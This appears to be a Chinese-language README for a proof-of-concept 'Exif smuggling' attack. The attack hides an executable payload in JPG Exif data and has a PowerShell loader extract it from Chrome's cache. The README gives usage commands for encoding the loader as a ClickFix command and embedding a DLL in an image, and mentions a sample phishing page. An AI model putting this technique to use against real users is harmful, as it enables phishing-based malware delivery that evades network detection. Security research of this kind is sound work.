缓存走私的概念性演变。这种攻击在 JPG 的 Exif 数据中隐藏了一个可执行有效负载。因此，图像缓存（例如网页浏览器的缓存）可以被用来被动下载该有效负载。因此，示例加载器 (chrome_poc.ps1) 不需要发出任何互联网请求来获取第二阶段有效负载。相反，它只是从 Chrome 浏览器的缓存中提取它。完整详情见： https://malwaretech.com/2025/10/exif-smuggling 示例用法 将 PowerShell 加载器转换为 ClickFix 命令 python3 build_clickfix_cmd.py --input-file chrome_poc.ps1 --output-file encoded_command.txt --fake-path "C:\test\doc.txt" 在任意 JPG 中嵌入有效负载 dll python3 exif_smuggling.py --input-file image.jpg --output-file payload.jpg --payload hello_world.dll 示例钓鱼页面 www/index.html